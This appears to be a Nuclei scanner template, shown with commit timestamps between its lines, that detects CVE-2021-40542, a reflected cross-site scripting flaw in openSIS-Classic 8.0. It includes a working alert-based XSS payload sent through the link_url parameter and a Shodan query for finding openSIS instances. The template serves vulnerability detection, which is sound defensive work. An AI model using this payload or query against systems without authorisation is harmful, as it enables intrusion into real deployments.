2021-11-25 18:22:30 +00:00
id : CVE-2021-40542
info :
2022-09-09 17:34:37 +00:00
name : Opensis-Classic 8.0 - Cross-Site Scripting
2021-11-25 18:22:30 +00:00
author : alph4byt3
severity : medium
2022-04-29 19:58:07 +00:00
description : |
Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.
2021-11-25 18:22:30 +00:00
reference :
- https://github.com/OS4ED/openSIS-Classic/issues/189
- https://nvd.nist.gov/vuln/detail/CVE-2021-40542
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-04-22 16:21:28 +00:00
cve-id : CVE-2021-40542
2021-11-25 18:22:30 +00:00
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:os4ed:opensis:*:*:*:*:*:*:*:*
epss-score : 0.02456
2022-07-10 09:37:25 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-07-10 09:37:25 +00:00
shodan-query : http.title:"openSIS"
2021-12-03 07:12:37 +00:00
tags : xss,cve,cve2021,opensis
2021-11-25 18:22:30 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-25 18:22:30 +00:00
- method : GET
path :
2021-12-03 07:12:37 +00:00
- '{{BaseURL}}/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-11-25 18:22:30 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2021-12-03 07:12:37 +00:00
- "</script><script>alert(document.domain)</script>"
2021-11-25 18:22:30 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-03-17 17:01:45 +00:00
2022-03-22 03:48:47 +00:00
# Enhanced by mp on 2022/03/18